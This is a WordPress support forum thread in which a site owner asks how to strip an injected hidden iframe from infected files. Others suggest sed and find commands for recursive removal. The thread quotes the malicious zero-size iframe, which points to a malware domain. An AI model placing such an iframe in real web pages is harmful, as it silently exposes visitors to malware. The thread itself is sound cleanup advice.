WordPress.org

Forums

[resolved] iframe injection - how to "search and replace" all the files ? (3 posts)

  1. talgalili
    Member
    Posted 5 years ago #

    Hi all.

    I am seeking help with someone who knows how to use perl with SSH - in order to repair files that where damaged by a malicious hacking bot.
    (one site that I have infected is, for example: http://www.talgalili.com)

    Here is the code that I wish to remove:

    <iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
    (leading to a malware link - which Avast detected)

    Using SSH, I now wish to search and replace all the files that has this line and erase that piece of code from them.
    I found this post:
    http://fieldsmarshall.com/htmliframe-inf-wordpress-infection/
    Explaining how to do so using this code:
    find / -type f -mtime -10 | xargs grep -l '<iframe'| xargs perl -pi -e 's/^.*\<iframe.*$/ /g'

    I would like to customize this code to erase exactly the piece of code mentioned, and not the whole line in which it resides.
    Any idea on how to do this ?

    Thanks,
    Tal

    p.s: a few other thread on the subject can be found on:
    http://wordpress.org/support/topic/271811?replies=2
    http://wordpress.org/support/topic/281767?replies=3
    http://wordpress.org/support/topic/277277?replies=7

    , but the code the persons presents are, I am afraid, to general

  2. eburcat
    Member
    Posted 5 years ago #

    BACKUP YOU FILES BEFORE YOU TRY THIS.
    Also, test your script before you actually run it on your production files!

    You can run:
    sed 's/string to be replaced/the replacement string/' < input.html > output.html

    If you need to escape a "/" in the "string to be replaced" part, you can use: '\/'.

    So, in your case, it's something like:

    sed 's/<iframe src="http:\/\/m-analytics.net\/qaqa\/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//' < a.html > b.html

    Another option is to scp the files to your desktop, run a search and replace with your favorite multi-file text editor, and scp the files back.

    I hope it helps...

  3. talgalili
    Member
    Posted 5 years ago #

    Thank you Eburcat.
    I eventually solved the problem and thought it would be nice to share the code I used with everyone else:

    find . -name '*.*' -exec sed -i 's/<iframe src="http:\/\/m-analytics.net\/qaqa\/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;

    p.s: I used PuTTY for the SSH, but several times had to do it again, since it crashed while doing some of the work (although it crashed less then winSCP).

    p.p.s: if you are new to wordpress, run, read, and install the security plugins mentioned here:
    http://weblogtoolscollection.com/archives/2009/06/15/security-and-anti-spam-plugins-for-wordpress/

    Cheers,
    Tal

Topic Closed

This topic has been closed to new replies.

About this Topic